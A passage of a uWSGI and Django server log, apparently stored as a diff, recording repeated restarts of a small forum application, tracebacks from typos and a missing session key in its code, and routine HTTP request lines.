flag) *** +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 17684) +spawned uWSGI worker 1 (pid: 17685, cores: 2) +spawned uWSGI http 1 (pid: 17686) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response + callback, callback_args, callback_kwargs = self.resolve_request(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request + resolver_match = resolver.resolve(request.path_info) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve + for pattern in self.url_patterns: + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns + patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module + return import_module(self.urlconf_name) + File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module + return _bootstrap._gcd_import(name[level:], package, level) + File "", line 1006, in _gcd_import + File "", line 983, in _find_and_load + File "", line 967, in _find_and_load_unlocked + File "", line 677, in _load_unlocked + File "", line 728, in exec_module + File "", line 219, in _call_with_frames_removed + File "./ForumSystem/urls.py", line 35, in + ulr(r'^\d+$',views.home), +NameError: name 'ulr' is not defined +[pid: 17685|app: 0|req: 1/1] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:32:57 2021] GET / => generated 111819 bytes in 78 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response + callback, callback_args, callback_kwargs = self.resolve_request(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request + resolver_match = resolver.resolve(request.path_info) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve + for pattern in self.url_patterns: + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns + patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module + return import_module(self.urlconf_name) + File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module + return _bootstrap._gcd_import(name[level:], package, level) + File "", line 1006, in _gcd_import + File "", line 983, in _find_and_load + File "", line 967, in _find_and_load_unlocked + File "", line 677, in _load_unlocked + File "", line 728, in exec_module + File "", line 219, in _call_with_frames_removed + File "./ForumSystem/urls.py", line 35, in + ulr(r'^\d+$',views.home), +NameError: name 'ulr' is not defined +[pid: 17685|app: 0|req: 2/2] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:32:59 2021] GET / => generated 111819 bytes in 40 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response + callback, callback_args, callback_kwargs = self.resolve_request(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request + resolver_match = resolver.resolve(request.path_info) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve + for pattern in self.url_patterns: + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns + patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module + return import_module(self.urlconf_name) + File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module + return _bootstrap._gcd_import(name[level:], package, level) + File "", line 1006, in _gcd_import + File "", line 983, in _find_and_load + File "", line 967, in _find_and_load_unlocked + File "", line 677, in _load_unlocked + File "", line 728, in exec_module + File "", line 219, in _call_with_frames_removed + File "./ForumSystem/urls.py", line 35, in + ulr(r'^\d+$',views.home), +NameError: name 'ulr' is not defined +[pid: 17685|app: 0|req: 3/3] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:32:59 2021] GET / => generated 111819 bytes in 39 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response + callback, callback_args, callback_kwargs = self.resolve_request(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request + resolver_match = resolver.resolve(request.path_info) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve + for pattern in self.url_patterns: + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns + patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module + return import_module(self.urlconf_name) + File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module + return _bootstrap._gcd_import(name[level:], package, level) + File "", line 1006, in _gcd_import + File "", line 983, in _find_and_load + File "", line 967, in _find_and_load_unlocked + File "", line 677, in _load_unlocked + File "", line 728, in exec_module + File "", line 219, in _call_with_frames_removed + File "./ForumSystem/urls.py", line 35, in + ulr(r'^\d+$',views.home), +NameError: name 'ulr' is not defined +[pid: 17685|app: 0|req: 4/4] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:33:00 2021] GET / => generated 111819 bytes in 38 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Fri Jan 8 13:34:46 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!! +Fri Jan 8 13:34:46 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!! +*** Starting uWSGI 2.0.19.1 (64bit) on [Fri Jan 8 21:34:47 2021] *** +compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 08 January 2021 13:09:04 +os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 +nodename: VM-0-13-centos +machine: x86_64 +clock source: unix +pcre jit disabled +detected number of CPU cores: 1 +current working directory: / +detected binary path: /www/wwwroot/master/master_venv/bin/uwsgi +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +chdir() to /www/wwwroot/master +your processes number limit is 7269 +your memory page size is 4096 bytes +detected max file descriptor number: 1024 +!!! no /etc/mime.types file found !!! +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on 0.0.0.0:8080 fd 4 +uwsgi socket 0 bound to TCP address 127.0.0.1:39268 (port auto-assigned) fd 3 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +Python version: 3.7.8 (default, Jul 6 2020, 09:48:19) [GCC 4.8.5 20150623 (Red Hat 4.8.5-39)] +Python main interpreter initialized at 0x137d9c0 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +python threads support enabled +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 166752 bytes (162 KB) for 2 cores +*** Operational MODE: threaded *** +ModuleNotFoundError: No module named 'master' +unable to load app 0 (mountpoint='') (callable not found or import error) +WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x137d9c0 pid: 18031 (default app) +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 18031) +spawned uWSGI worker 1 (pid: 18032, cores: 2) +spawned uWSGI http 1 (pid: 18033) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response + callback, callback_args, callback_kwargs = self.resolve_request(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request + resolver_match = resolver.resolve(request.path_info) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve + for pattern in self.url_patterns: + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns + patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module + return import_module(self.urlconf_name) + File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module + return _bootstrap._gcd_import(name[level:], package, level) + File "", line 1006, in _gcd_import + File "", line 983, in _find_and_load + File "", line 967, in _find_and_load_unlocked + File "", line 677, in _load_unlocked + File "", line 728, in exec_module + File "", line 219, in _call_with_frames_removed + File "./ForumSystem/urls.py", line 35, in + re_path(r'^$',views.index), +NameError: name 're_path' is not defined +[pid: 18032|app: 0|req: 1/1] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:34:56 2021] GET / => generated 111839 bytes in 81 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response + callback, callback_args, callback_kwargs = self.resolve_request(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request + resolver_match = resolver.resolve(request.path_info) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve + for pattern in self.url_patterns: + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns + patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module + return import_module(self.urlconf_name) + File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module + return _bootstrap._gcd_import(name[level:], package, level) + File "", line 1006, in _gcd_import + File "", line 983, in _find_and_load + File "", line 967, in _find_and_load_unlocked + File "", line 677, in _load_unlocked + File "", line 728, in exec_module + File "", line 219, in _call_with_frames_removed + File "./ForumSystem/urls.py", line 35, in + re_path(r'^$',views.index), +NameError: name 're_path' is not defined +[pid: 18032|app: 0|req: 2/2] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:34:57 2021] GET / => generated 111839 bytes in 39 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response + callback, callback_args, callback_kwargs = self.resolve_request(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request + resolver_match = resolver.resolve(request.path_info) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve + for pattern in self.url_patterns: + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns + patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module + return import_module(self.urlconf_name) + File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module + return _bootstrap._gcd_import(name[level:], package, level) + File "", line 1006, in _gcd_import + File "", line 983, in _find_and_load + File "", line 967, in _find_and_load_unlocked + File "", line 677, in _load_unlocked + File "", line 728, in exec_module + File "", line 219, in _call_with_frames_removed + File "./ForumSystem/urls.py", line 35, in + re_path(r'^$',views.index), +NameError: name 're_path' is not defined +[pid: 18032|app: 0|req: 3/3] 117.100.100.38 () {38 vars in 1324 bytes} [Fri Jan 8 13:35:02 2021] GET / => generated 111702 bytes in 40 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Fri Jan 8 13:35:49 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!! +Fri Jan 8 13:35:49 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!! +*** Starting uWSGI 2.0.19.1 (64bit) on [Fri Jan 8 21:35:50 2021] *** +compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 08 January 2021 13:09:04 +os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 +nodename: VM-0-13-centos +machine: x86_64 +clock source: unix +pcre jit disabled +detected number of CPU cores: 1 +current working directory: / +detected binary path: /www/wwwroot/master/master_venv/bin/uwsgi +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +chdir() to /www/wwwroot/master +your processes number limit is 7269 +your memory page size is 4096 bytes +detected max file descriptor number: 1024 +!!! no /etc/mime.types file found !!! +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on 0.0.0.0:8080 fd 4 +uwsgi socket 0 bound to TCP address 127.0.0.1:34741 (port auto-assigned) fd 3 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +Python version: 3.7.8 (default, Jul 6 2020, 09:48:19) [GCC 4.8.5 20150623 (Red Hat 4.8.5-39)] +Python main interpreter initialized at 0x2a1d9c0 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +python threads support enabled +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 166752 bytes (162 KB) for 2 cores +*** Operational MODE: threaded *** +ModuleNotFoundError: No module named 'master' +unable to load app 0 (mountpoint='') (callable not found or import error) +WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x2a1d9c0 pid: 18256 (default app) +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 18256) +spawned uWSGI worker 1 (pid: 18257, cores: 2) +spawned uWSGI http 1 (pid: 18258) +[pid: 18257|app: 0|req: 1/1] 117.100.100.38 () {40 vars in 1354 bytes} [Fri Jan 8 13:35:55 2021] GET / => generated 6416 bytes in 41 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18257|app: 0|req: 2/2] 117.100.100.38 () {40 vars in 1354 bytes} [Fri Jan 8 13:35:58 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18257|app: 0|req: 3/3] 117.100.100.38 () {40 vars in 1354 bytes} [Fri Jan 8 13:35:59 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18257|app: 0|req: 4/4] 117.100.100.38 () {40 vars in 1354 bytes} [Fri Jan 8 13:36:00 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Fri Jan 8 13:36:17 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!! +Fri Jan 8 13:36:17 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!! +*** Starting uWSGI 2.0.19.1 (64bit) on [Fri Jan 8 21:36:19 2021] *** +compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 08 January 2021 13:09:04 +os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 +nodename: VM-0-13-centos +machine: x86_64 +clock source: unix +pcre jit disabled +detected number of CPU cores: 1 +current working directory: / +detected binary path: /www/wwwroot/master/master_venv/bin/uwsgi +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +chdir() to /www/wwwroot/master +your processes number limit is 7269 +your memory page size is 4096 bytes +detected max file descriptor number: 1024 +!!! no /etc/mime.types file found !!! +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on 0.0.0.0:8080 fd 4 +uwsgi socket 0 bound to TCP address 127.0.0.1:33840 (port auto-assigned) fd 3 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +Python version: 3.7.8 (default, Jul 6 2020, 09:48:19) [GCC 4.8.5 20150623 (Red Hat 4.8.5-39)] +Python main interpreter initialized at 0x10529c0 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +python threads support enabled +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 166752 bytes (162 KB) for 2 cores +*** Operational MODE: threaded *** +ModuleNotFoundError: No module named 'master' +unable to load app 0 (mountpoint='') (callable not found or import error) +WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x10529c0 pid: 18394 (default app) +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 18394) +spawned uWSGI worker 1 (pid: 18395, cores: 2) +spawned uWSGI http 1 (pid: 18396) +[pid: 18395|app: 0|req: 1/1] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:36:24 2021] GET / => generated 7795 bytes in 51 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 18395|app: 0|req: 2/2] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:36:26 2021] GET / => generated 7795 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 18395|app: 0|req: 3/3] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:36:27 2021] GET / => generated 7795 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 18395|app: 0|req: 4/4] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:36:28 2021] GET / => generated 7795 bytes in 6 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 18395|app: 0|req: 5/5] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:36:28 2021] GET / => generated 7795 bytes in 6 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 18395|app: 0|req: 6/6] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:36:29 2021] GET / => generated 7795 bytes in 6 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 18395|app: 0|req: 7/7] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:36:29 2021] GET / => generated 7795 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 18395|app: 0|req: 8/8] 117.100.100.38 () {40 vars in 1382 bytes} [Fri Jan 8 13:36:30 2021] GET /publish/ => generated 4909 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +sfdfd ewewew +Internal Server Error: /publish/ +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 203, in publish + t_photo_path = 'static/img/t_photo/' + str(t_id) + '_' + t_photo.name +AttributeError: 'NoneType' object has no attribute 'name' +[pid: 18395|app: 0|req: 9/9] 117.100.100.38 () {48 vars in 1567 bytes} [Fri Jan 8 13:36:37 2021] POST /publish/ => generated 60822 bytes in 29 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 0) +sfdfd ewewew +Internal Server Error: /publish/ +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 203, in publish + t_photo_path = 'static/img/t_photo/' + str(t_id) + '_' + t_photo.name +AttributeError: 'NoneType' object has no attribute 'name' +[pid: 18395|app: 0|req: 10/10] 117.100.100.38 () {48 vars in 1567 bytes} [Fri Jan 8 13:36:52 2021] POST /publish/ => generated 60832 bytes in 27 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 1) +sfdfd ewewew +[pid: 18395|app: 0|req: 11/11] 117.100.100.38 () {48 vars in 1569 bytes} [Fri Jan 8 13:37:01 2021] POST /publish/ => generated 0 bytes in 413 msecs (HTTP/1.1 302) 7 headers in 202 bytes (17 switches on core 0) +[pid: 18395|app: 0|req: 12/12] 117.100.100.38 () {42 vars in 1421 bytes} [Fri Jan 8 13:37:02 2021] GET /single/4 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 18395|app: 0|req: 13/13] 117.100.100.38 () {42 vars in 1423 bytes} [Fri Jan 8 13:37:02 2021] GET /single/4/ => generated 8198 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18395|app: -1|req: -1/14] 117.100.100.38 () {38 vars in 1285 bytes} [Fri Jan 8 13:37:02 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 18395|app: -1|req: -1/15] 117.100.100.38 () {38 vars in 1283 bytes} [Fri Jan 8 13:37:02 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 18395|app: -1|req: -1/16] 117.100.100.38 () {38 vars in 1313 bytes} [Fri Jan 8 13:37:02 2021] GET /static/img/t_photo/4_2.png => generated 88960 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 18395|app: 0|req: 14/17] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:37:27 2021] GET / => generated 7795 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 18395|app: 0|req: 15/18] 117.100.100.38 () {40 vars in 1382 bytes} [Fri Jan 8 13:37:29 2021] GET /publish/ => generated 4909 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +0 +0 +[, ] +[pid: 18395|app: 0|req: 16/19] 117.100.100.38 () {40 vars in 1384 bytes} [Fri Jan 8 13:37:33 2021] GET /all-1-0-0 => generated 9093 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/img/t_photo/1_2.png +[pid: 18395|app: 0|req: 17/20] 117.100.100.38 () {38 vars in 1313 bytes} [Fri Jan 8 13:37:33 2021] GET /static/img/t_photo/1_2.png => generated 3442 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /None +[pid: 18395|app: 0|req: 18/21] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 13:37:33 2021] GET /None => generated 3376 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18395|app: 0|req: 19/22] 117.100.100.38 () {42 vars in 1423 bytes} [Fri Jan 8 13:37:41 2021] GET /single/4/ => generated 8198 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18395|app: -1|req: -1/23] 117.100.100.38 () {40 vars in 1368 bytes} [Fri Jan 8 13:37:41 2021] GET /static/img/t_photo/4_2.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 38, in home + response['uid'] = request.session['uid'] + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__ + return self._session[key] +KeyError: 'uid' +[pid: 18395|app: 0|req: 20/24] 223.104.39.100 () {38 vars in 935 bytes} [Fri Jan 8 13:38:16 2021] GET / => generated 57925 bytes in 25 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 0) +Not Found: /favicon.ico +[pid: 18395|app: 0|req: 21/25] 223.104.39.100 () {38 vars in 907 bytes} [Fri Jan 8 13:38:17 2021] GET /favicon.ico => generated 3397 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 38, in home + response['uid'] = request.session['uid'] + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__ + return self._session[key] +KeyError: 'uid' +[pid: 18395|app: 0|req: 22/26] 223.104.39.100 () {38 vars in 935 bytes} [Fri Jan 8 13:38:18 2021] GET / => generated 57925 bytes in 25 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 1) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File 